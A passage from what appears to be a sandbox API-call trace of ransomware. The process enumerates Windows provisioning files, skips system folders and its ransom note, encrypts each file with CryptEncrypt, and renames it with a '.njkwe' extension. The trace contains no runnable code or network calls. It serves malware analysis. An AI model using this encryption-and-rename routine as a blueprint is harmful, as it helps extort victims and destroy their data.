lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\389__Connections_Cellular_Starhub (Singapore)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\389__connections_cellular_starhub (singapore)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.862] GetProcessHeap () returned 0xbe0000 [0078.862] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.862] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90221ca6, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90221ca6, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90221ca6, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x319, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml", cAlternateFileName="38__CO~1.PRO")) returned 1 [0078.862] lstrcmpiW (lpString1="38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.862] lstrcmpiW (lpString1="38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.862] lstrcmpiW (lpString1="38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.862] lstrcmpiW (lpString1="38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.862] lstrcmpiW (lpString1="38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.862] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml") returned 176 [0078.862] StrStrIW (lpFirst="38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.862] lstrcmpW (lpString1="38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.863] lstrcmpW (lpString1="38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.863] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\38__Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.863] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\38__connections_cellular_jllc mobile telesystems (belarus)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.863] GetTickCount () returned 0x11540af [0078.863] GetTickCount () returned 0x11540af [0078.863] GetTickCount () returned 0x11540af [0078.863] GetTickCount () returned 0x11540af [0078.863] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.863] GetProcessHeap () returned 0xbe0000 [0078.863] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.863] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x319, lpOverlapped=0x0) returned 1 [0078.865] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffce7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.865] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x319, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x319, lpOverlapped=0x0) returned 1 [0078.865] GetProcessHeap () returned 0xbe0000 [0078.865] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.865] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.865] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.865] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.865] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.865] CloseHandle (hObject=0x43c) returned 1 [0078.865] GetProcessHeap () returned 0xbe0000 [0078.865] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.865] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 196 [0078.865] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\38__connections_cellular_jllc mobile telesystems (belarus)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\38__Connections_Cellular_JLLC Mobile TeleSystems (Belarus)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\38__connections_cellular_jllc mobile telesystems (belarus)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.870] GetProcessHeap () returned 0xbe0000 [0078.870] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.870] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e340a5, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e340a5, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e340a5, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml", cAlternateFileName="390__C~1.PRO")) returned 1 [0078.870] lstrcmpiW (lpString1="390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.870] lstrcmpiW (lpString1="390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.870] lstrcmpiW (lpString1="390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.870] lstrcmpiW (lpString1="390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.870] lstrcmpiW (lpString1="390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.870] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml") returned 163 [0078.870] StrStrIW (lpFirst="390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.870] lstrcmpW (lpString1="390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.870] lstrcmpW (lpString1="390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.870] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\390__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.870] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\390__connections_cellular_starhub (singapore)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.871] GetTickCount () returned 0x11540af [0078.871] GetTickCount () returned 0x11540af [0078.871] GetTickCount () returned 0x11540af [0078.871] GetTickCount () returned 0x11540af [0078.871] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.871] GetProcessHeap () returned 0xbe0000 [0078.871] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.871] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x34e, lpOverlapped=0x0) returned 1 [0078.880] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.880] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x34e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x34e, lpOverlapped=0x0) returned 1 [0078.880] GetProcessHeap () returned 0xbe0000 [0078.880] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.881] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.881] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.881] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.881] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.881] CloseHandle (hObject=0x43c) returned 1 [0078.881] GetProcessHeap () returned 0xbe0000 [0078.881] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.881] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.881] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\390__connections_cellular_starhub (singapore)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\390__Connections_Cellular_Starhub (Singapore)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\390__connections_cellular_starhub (singapore)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.882] GetProcessHeap () returned 0xbe0000 [0078.882] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.882] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e5a314, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e5a314, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e5a314, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x281, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="391__C~1.PRO")) returned 1 [0078.882] lstrcmpiW (lpString1="391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.882] lstrcmpiW (lpString1="391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.882] lstrcmpiW (lpString1="391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.882] lstrcmpiW (lpString1="391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.882] lstrcmpiW (lpString1="391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.882] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml") returned 157 [0078.882] StrStrIW (lpFirst="391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.882] lstrcmpW (lpString1="391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.882] lstrcmpW (lpString1="391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.882] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\391__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.882] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\391__connections_cellular_o2 (slovakia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.882] GetTickCount () returned 0x11540be [0078.883] GetTickCount () returned 0x11540be [0078.883] GetTickCount () returned 0x11540be [0078.883] GetTickCount () returned 0x11540be [0078.883] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.883] GetProcessHeap () returned 0xbe0000 [0078.883] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.883] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x281, lpOverlapped=0x0) returned 1 [0078.884] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.884] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x281, lpOverlapped=0x0) returned 1 [0078.884] GetProcessHeap () returned 0xbe0000 [0078.884] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.884] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.884] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.885] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.885] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.885] CloseHandle (hObject=0x43c) returned 1 [0078.885] GetProcessHeap () returned 0xbe0000 [0078.885] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.885] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0078.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\391__connections_cellular_o2 (slovakia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\391__Connections_Cellular_O2 (Slovakia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\391__connections_cellular_o2 (slovakia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.886] GetProcessHeap () returned 0xbe0000 [0078.886] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.886] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90e5a314, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90e5a314, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90e5a314, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="392__C~1.PRO")) returned 1 [0078.889] lstrcmpiW (lpString1="392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.889] lstrcmpiW (lpString1="392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.890] lstrcmpiW (lpString1="392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.890] lstrcmpiW (lpString1="392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.890] lstrcmpiW (lpString1="392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.890] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml") returned 161 [0078.890] StrStrIW (lpFirst="392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.890] lstrcmpW (lpString1="392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.890] lstrcmpW (lpString1="392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.890] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\392__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.890] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\392__Connections_Cellular_Orange (Slovakia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\392__connections_cellular_orange (slovakia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.890] GetTickCount () returned 0x11540ce [0078.890] GetTickCount () returned 0x11540ce [0078.890] GetTickCount () returned 0x11540ce [0078.890] GetTickCount () returned 0x11540ce [0078.890] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.890] GetProcessHeap () returned 0xbe0000 [0078.890] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.890] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0078.892] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.892] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0078.892] GetProcessHeap () returned 0xbe0000 [0078.892] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.892] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.892] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.892] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, 